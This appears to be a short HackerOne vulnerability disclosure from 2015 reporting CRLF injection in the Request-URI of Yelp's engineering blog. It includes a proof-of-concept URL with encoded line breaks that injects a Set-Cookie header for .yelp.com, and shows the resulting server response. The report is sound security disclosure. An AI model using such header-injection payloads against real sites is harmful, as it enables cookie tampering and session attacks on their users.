Yelp: [engineeringblog.yelp.com] CRLF Injection

2015-06-07T09:02:26
ID H1:66391
Type hackerone
Reporter bobrov
Modified 2017-11-09T20:12:42

Description

CRLF Injection via Request-URI

PoC:

https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com Result: Creating a cookie-param "test=test" on *.yelp.com